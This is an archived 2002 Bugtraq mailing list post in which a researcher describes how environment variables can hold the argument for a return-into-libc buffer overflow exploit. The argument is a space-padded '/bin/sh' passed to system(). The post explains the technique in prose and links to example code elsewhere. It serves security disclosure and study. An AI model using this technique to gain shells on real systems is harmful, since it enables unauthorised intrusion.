Home page logo

bugtraq logo Bugtraq mailing list archives

Using Environment for returning into Lib C
From: "Elie aka \"Lupin\" Bursztein" <elie () bursztein net>
Date: Tue, 26 Feb 2002 19:27:59 -0800

This advisory intends to present a new way to make a return to lib C exploit.


By using the environment variables one could easily exploit a buffer
overflow with the return into lib C technic.

If we make an analogy with the shellcode technic :
the \x20 act as \x90. For the system() function the sting "/bin/sh/" is equal
to "          /bin/sh".
the return address overflowed is the system() address.
the arg address will be our variables environment address.
It give flexibility to the arg passed and help to chaining the return to lib C.


Related article describing this technic and example source code : http://www.bursztein.net/secu/rilc.html

This technic should open a new range of exploits using the return into lib C.


Elie aka "Lupin" Bursztein
icq  : 32228319
mail : elie () bursztein net
web  : www.bursztein.net
"Simplicity is difficulty"

  By Date           By Thread  

Current thread:
  • Using Environment for returning into Lib C Elie aka \"Lupin\" Bursztein (Feb 28)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]